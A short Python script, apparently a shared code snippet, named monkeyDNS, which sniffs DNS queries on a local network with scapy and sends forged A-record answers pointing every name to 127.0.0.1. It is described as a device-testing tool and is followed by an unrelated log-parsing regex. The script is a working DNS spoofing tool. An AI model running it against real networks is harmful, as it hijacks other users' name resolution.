a simple mini DNS sniffer which tamper responses over local network

monkeyDNS.py

#!/usr/bin/python
"""
monkeyDNS:  mini fake dns server to tamper device's queries during testing
        dont work with google's dns because they are too fast!
"""
import scapy, sys
from scapy.all import *

interface = 'eth0'
fake_address = '127.0.0.1'

def monkeyHandler(data):

  if data.haslayer(DNS) and data.haslayer(DNSQR):
     ip = data.getlayer(IP)
     udp = data.getlayer(UDP)
     dns = data.getlayer(DNS)
     dnsqr = data.getlayer(DNSQR)
     print '[Sniff][id:%s] QR(%s) ? %s ( %s > %s )' \
        % (dns.id, dnsqr.qtype, dnsqr.qname, ip.src, ip.dst)

     if len(dnsqr.qname) !=0 and dnsqr.qtype == 1:
        response = DNSRR(rrname = dnsqr.qname, type='A', rclass='IN', ttl = 64, \
                   rdata = fake_address)
        forged = IP(id=ip.id, src=ip.dst, dst=ip.src) \
                 /UDP(sport=udp.dport, dport=udp.sport) \
                 /DNS(id=dns.id, qr=1, rd=1, ra=1, aa=1, tc=0, rcode=0, \
                      qd=dnsqr, an=response)
    	send(forged, verbose=0, iface=interface)
        print '[Ooook][id:%s] RR ! %s ( %s > %s )' % (dns.id, dnsqr.qname, ip.src, ip.dst)

try:
  print 'monkeyDNS: domain.tld. 60 IN A %s' % fake_address	
  while True:
    mSniff = sniff(filter="udp dst port 53", iface=interface, prn=monkeyHandler)
except (KeyboardInterrupt):
  exit

^(\d{2}-\w{3}-\d{4}\s+\d{2}:\d{2}:\d{2}.\d{3})\s+client\s+(\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3})#\d+:\s+query:\s+(.*)\s+IN\s+(\w+)\s++\s+((\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}))$